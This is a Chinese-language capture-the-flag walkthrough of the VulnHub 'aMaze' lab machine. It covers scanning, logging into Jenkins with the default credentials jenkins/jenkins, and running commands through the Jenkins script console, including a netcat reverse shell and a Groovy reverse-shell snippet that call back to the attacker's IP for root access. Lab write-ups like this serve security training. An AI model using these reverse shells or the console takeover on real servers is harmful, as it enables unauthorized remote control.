AMAZE_1

admin 2025年4月9日23:19:30评论1 views字数 111阅读0分22秒阅读模式

下载地址:https://download.vulnhub.com/amaze/aMaze.ova

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.154 仅主机 vxbox

参考:https://mp.weixin.qq.com/s?__biz=MzIzNDE0Mzk0NA==&mid=2649593152&idx=1&sn=ca8c170e39e28cba11f767c2654f3753&chksm=f0e3dce7c79455f1982930a67c61d9d461544eb497c7852d1f8c7a1fe042111881347c4af547&scene=21#wechat_redirect

主机发现

arp-scan -I eth1 -l

AMAZE_1

端口扫描

Jetty 是一个开源的 Java Web 服务器和 Servlet 容器,广泛用于开发和托管 Java 应用程序和服务。

AMAZE_1

21端口支持anonymous,但是里面是空的

AMAZE_1

web主页直接403

AMAZE_1

目录扫描发现登录口

AMAZE_1

AMAZE_1

sql注入,暴力破解都没成功

AMAZE_1

AMAZE_1

5000端口的jenkins使用弱口令进入系统

jenkins/jenkins

AMAZE_1

AMAZE_1

查看版本

AMAZE_1

查看漏洞

AMAZE_1

反弹失败

AMAZE_1

系统管理找到脚本命令行

AMAZE_1

可以直接执行root命令

println "id".execute().text

AMAZE_1

反弹shell直接获得root权限

println "nc 192.168.56.132 1111 -e /bin/bash".execute().text

AMAZE_1

AMAZE_1

方法2

https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76#file-revsh-groovy

String host="192.168.56.132";int port=2222;String cmd="/bin/bash";Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

AMAZE_1

AMAZE_1

原文始发于微信公众号(王之暴龙战神):AMAZE_1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月9日23:19:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   AMAZE_1https://cn-sec.com/archives/3932685.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息